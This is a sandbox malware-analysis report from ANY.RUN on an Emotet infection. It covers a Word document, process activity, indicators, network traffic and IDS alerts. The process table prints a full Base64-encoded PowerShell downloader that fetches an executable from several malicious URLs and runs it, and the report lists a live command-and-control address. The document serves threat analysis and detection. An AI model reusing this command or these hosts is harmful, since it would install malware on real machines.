analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://herrajesmasota.com/contact_page/ZBEfBfHvasUMKLwJh/

Full analysis: https://app.any.run/tasks/38f73c3f-4aef-4517-938a-89bc466f62fb
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 24, 2019, 01:11:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
trojan
feodo
emotet-doc
Indicators:
MD5:

D8E050D100B58477475E8E180169D7A2

SHA1:

C18E930DE8C976273CCA3A0CFF899EAA14D577B0

SHA256:

49940C78DA8DC473F9044710DE4629E688734002908B6E6891E9F4DAEDA6D9A2

SSDEEP:

3:N1KWAHEbIjGGdLlkUkngHhlq:CWEEbIjzlhHhlq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 770.exe (PID: 2992)
      • 770.exe (PID: 968)
      • soundser.exe (PID: 904)
      • soundser.exe (PID: 1356)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3420)
    • Connects to CnC server

      • soundser.exe (PID: 904)
    • EMOTET was detected

      • soundser.exe (PID: 904)
    • Emotet process was detected

      • soundser.exe (PID: 1356)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • iexplore.exe (PID: 3316)
      • WINWORD.EXE (PID: 1976)
    • Application launched itself

      • WINWORD.EXE (PID: 1976)
      • 770.exe (PID: 968)
    • PowerShell script executed

      • powershell.exe (PID: 3420)
    • Executed via WMI

      • powershell.exe (PID: 3420)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3420)
      • 770.exe (PID: 2992)
    • Starts itself from another location

      • 770.exe (PID: 2992)
    • Creates files in the user directory

      • powershell.exe (PID: 3420)
    • Connects to server without host name

      • soundser.exe (PID: 904)
  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 3316)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3092)
    • Creates files in the user directory

      • iexplore.exe (PID: 3092)
      • WINWORD.EXE (PID: 1976)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3092)
    • Application launched itself

      • iexplore.exe (PID: 3316)
      • chrome.exe (PID: 2852)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1976)
      • WINWORD.EXE (PID: 1864)
    • Manual execution by user

      • chrome.exe (PID: 2852)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
27
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe 770.exe no specs 770.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3316"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3092"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3316 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1976"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\12CSIY9T\Document_09433331985US_May_21_2019[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1864"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3420powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABOAF8ANABfADAANQA3AF8APQAnAHUAMAAyAF8AOQAwACcAOwAkAFUAOQA2ADQAOQAxADcAXwAgAD0AIAAnADcANwAwACcAOwAkAHcAMwA1ADYAXwA3AD0AJwBWADEAMQAyADYAMgA5ACcAOwAkAHMANgA5ADgAMQBfADEAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQA5ADYANAA5ADEANwBfACsAJwAuAGUAeABlACcAOwAkAEwAOQAwADcANAAxADQAXwA9ACcAaAA3ADcAMAAzADEAOAAnADsAJABtADAAMQA0ADkAOQAwAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdABgAC4AVwBgAEUAQgBDAGwASQBlAGAATgB0ADsAJABhADMANAAwADMANwA5AD0AJwBoAHQAdABwAHMAOgAvAC8AbwB2AGUAcgBjAHIAZQBhAHQAaQB2AGUALgBjAG8AbQAvAGMAcwBzAC8AcwBoAGUAYwBnAGUAcwBpAGEAXwBjAGoAdABmADcAcwA2AC0AMgA1ADgANgA2ADUAOAA3ADIAMAAvAEAAaAB0AHQAcAA6AC8ALwBhAG4AdABvAG4AcgBlAHMAaQBkAGUAbgB0AGkAYQBsAC4AYwBvAG0ALwB3AGsAZAByAGwAawAvAHAAYQBwAGsAYQBhADEANwAvAE4AdQBqAFUASgBlAHQATgB5AC8AQABoAHQAdABwADoALwAvAGcAYQB3AGEAaABlAHIALQBzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQAvAG4AbgBnAGIAMgA0AHkALwB2AFgARwBBAHAAVwBVAHcAZAAvAEAAaAB0AHQAcAA6AC8ALwB0AGgAZQBwAHIAbwBwAGUAcgB0AHkAZABlAGEAbABlAHIAegAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADUAegBlADcAdgBzAF8AdABnAHQANgBlADMAawAtADUALwBAAGgAdAB0AHAAOgAvAC8AZwB1AGkAbQBhAHIAYQBlAHMAYwBvAG4AcwB0AHIAdQB0AG8AcgBhAHMAagBjAC4AYwBvAG0ALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATgBUAGwAVABaAHQAQQBVAEIALwAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAcwA1ADQANAAyAF8AMwA9ACcASAA1ADgANQAzADAANwBfACcAOwBmAG8AcgBlAGEAYwBoACgAJABaADEAOQA5ADEAOQA1AF8AIABpAG4AIAAkAGEAMwA0ADAAMwA3ADkAKQB7AHQAcgB5AHsAJABtADAAMQA0ADkAOQAwAC4ARABvAFcATgBsAG8AYQBkAEYAaQBsAGUAKAAkAFoAMQA5ADkAMQA5ADUAXwAsACAAJABzADYAOQA4ADEAXwAxADIAKQA7ACQAagAzADEANwBfADEAMQAwAD0AJwBxADIAOQA0ADIAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHMANgA5ADgAMQBfADEAMgApAC4AbABlAG4ARwBUAEgAIAAtAGcAZQAgADIAOQAyADIAOAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABzADYAOQA4ADEAXwAxADIAOwAkAGoAOAAyADEANgA5ADcAPQAnAFYAOAAzADMANQAxACcAOwBiAHIAZQBhAGsAOwAkAG4AMAA1ADQAMgAxADUAPQAnAEMAOAA1ADQANAA1ADkANwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADMANwA5ADUAMgA9ACcASgAwADcAOQA5ADEAOAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
968"C:\Users\admin\770.exe" C:\Users\admin\770.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2992--1fcd1deeC:\Users\admin\770.exe
770.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1356"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
770.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
904--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
2852"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
Total events
3 086
Read events
2 494
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
42
Text files
168
Unknown types
17

Dropped files

PID
Process
Filename
Type
3316iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
3316iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3316iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF2CB78F703E34A603.TMP
MD5:
SHA256:
1976WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR920.tmp.cvr
MD5:
SHA256:
1976WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_9054B5BB-3077-40A3-BEDC-86B84B36276E.0\E0BD3088.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3092iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\49LQJBZN\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3092iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@herrajesmasota[1].txttext
MD5:E149DB135E344A12FC418F7069F58786
SHA256:7A2512F664D3B9E40684E6513B829CBF91ECC463DA3411D62AADA4EE96F18B4A
3092iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.datdat
MD5:436D96BAF9395B3A04F0B81B3DC7C881
SHA256:6448A8871E04FA03403DB18320067F15A8E866912CFDCC69C0225B753AC79DD0
3092iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\12CSIY9T\Document_09433331985US_May_21_2019[1].docdocument
MD5:34C47E51F180223CDFC5E09BAC4E1EFD
SHA256:B5056A4428F82D032102DAF7CBE6F648D82EA7724293AF72D1788DD8E5E74302
1976WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5803AA7D4464BF2FB4B22509ABC05EEC
SHA256:9CD271160D69D974542476FE2BF1A564A5E7485CFDC7E7D2BD7270444EB2EC50
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
27
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
904
soundser.exe
POST
23.95.95.18:80
http://23.95.95.18/report/stubs/ringin/
US
malicious
3092
iexplore.exe
GET
200
185.14.56.84:80
http://herrajesmasota.com/contact_page/ZBEfBfHvasUMKLwJh/
ES
document
89.5 Kb
suspicious
3420
powershell.exe
GET
200
173.249.63.33:80
http://gawaher-services.com/nngb24y/vXGApWUwd/
US
executable
74.0 Kb
suspicious
3420
powershell.exe
GET
301
138.197.208.96:80
http://antonresidential.com/wkdrlk/papkaa17/NujUJetNy/
US
html
178 b
unknown
2852
chrome.exe
GET
200
173.194.138.201:80
http://r4---sn-aigzrn7d.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx?cms_redirect=yes&mip=217.147.89.18&mm=28&mn=sn-aigzrn7d&ms=nvh&mt=1558660228&mv=m&pl=22&shardbypass=yes
US
crx
842 Kb
whitelisted
2852
chrome.exe
GET
302
216.58.207.78:80
http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx
US
html
504 b
whitelisted
3316
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2852
chrome.exe
172.217.22.67:443
www.google.com.ua
Google Inc.
US
whitelisted
2852
chrome.exe
172.217.16.163:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
172.217.16.163:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3420
powershell.exe
173.249.63.33:80
gawaher-services.com
Contabo GmbH
US
suspicious
3316
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3420
powershell.exe
69.90.66.10:443
overcreative.com
Peer 1 Network (USA) Inc.
CA
unknown
2852
chrome.exe
172.217.18.109:443
accounts.google.com
Google Inc.
US
suspicious
3092
iexplore.exe
185.14.56.84:80
herrajesmasota.com
Grupo Sys4net, S.l.
ES
suspicious
3420
powershell.exe
138.197.208.96:443
antonresidential.com
Digital Ocean, Inc.
US
unknown
3420
powershell.exe
138.197.208.96:80
antonresidential.com
Digital Ocean, Inc.
US
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
herrajesmasota.com
  • 185.14.56.84
suspicious
overcreative.com
  • 69.90.66.10
unknown
antonresidential.com
  • 138.197.208.96
unknown
gawaher-services.com
  • 173.249.63.33
suspicious
www.google.com.ua
  • 172.217.22.67
whitelisted
clientservices.googleapis.com
  • 172.217.16.163
whitelisted
accounts.google.com
  • 172.217.18.109
shared
clients1.google.com
  • 172.217.16.142
whitelisted
ssl.gstatic.com
  • 172.217.16.131
whitelisted

Threats

PID
Process
Class
Message
3092
iexplore.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
3420
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3420
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3420
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
904
soundser.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 16
No debug info